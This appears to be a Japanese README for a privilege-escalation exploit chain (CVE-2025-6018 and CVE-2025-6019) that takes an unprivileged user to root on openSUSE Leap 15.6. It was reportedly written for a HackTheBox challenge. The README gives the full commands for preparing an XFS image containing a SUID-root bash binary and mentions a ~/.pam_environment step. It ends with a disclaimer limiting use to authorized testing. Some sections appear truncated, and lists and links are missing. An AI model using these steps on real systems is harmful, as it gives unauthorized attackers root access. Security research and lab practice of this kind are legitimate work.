
openSUSE Leap 15.6 用の権限昇格エクスプロイトチェーン (CVE-2025-6018 + CVE-2025-6019)
このエクスプロイトは、openSUSE Leap 15.6 を標的とした HackTheBox チャレンジを解決するために開発されました。
このエクスプロイトは、Qualys セキュリティチームによる元の研究に基づいています:
追加のリファレンス実装:
このエクスプロイトは、openSUSE Leap 15.6 上で非特権ユーザーから root へのローカル権限昇格を達成するために、2 つの脆弱性を連鎖させます:
このエクスプロイトには、SUID bash バイナリを含む事前作成済みの XFS ファイルシステムイメージが必要です。これは、root 権限を持つ Linux マシン上で作成する必要があります:
dd if=/dev/zero of=xfs.image bs=1M count=400
mkfs.xfs xfs.image
mkdir -p /tmp/mnt
mount xfs.image /tmp/mnt
cp /bin/bash /tmp/mnt/bash
chmod 04755 /tmp/mnt/bash
umount /tmp/mnt
イメージが正しく作成されたことを確認します:
file xfs.image
# Should output: "SGI XFS filesystem data (blksz 4096, inosz 256, v2 dirs)"
~/.pam_environment を作成しますエクスプロイトが失敗した場合:
file xfs.imagesystemctl status udisks2このエクスプロイトは、教育目的および許可されたセキュリティテスト専用です。責任を持って、テストする許可を得たシステムでのみ使用してください。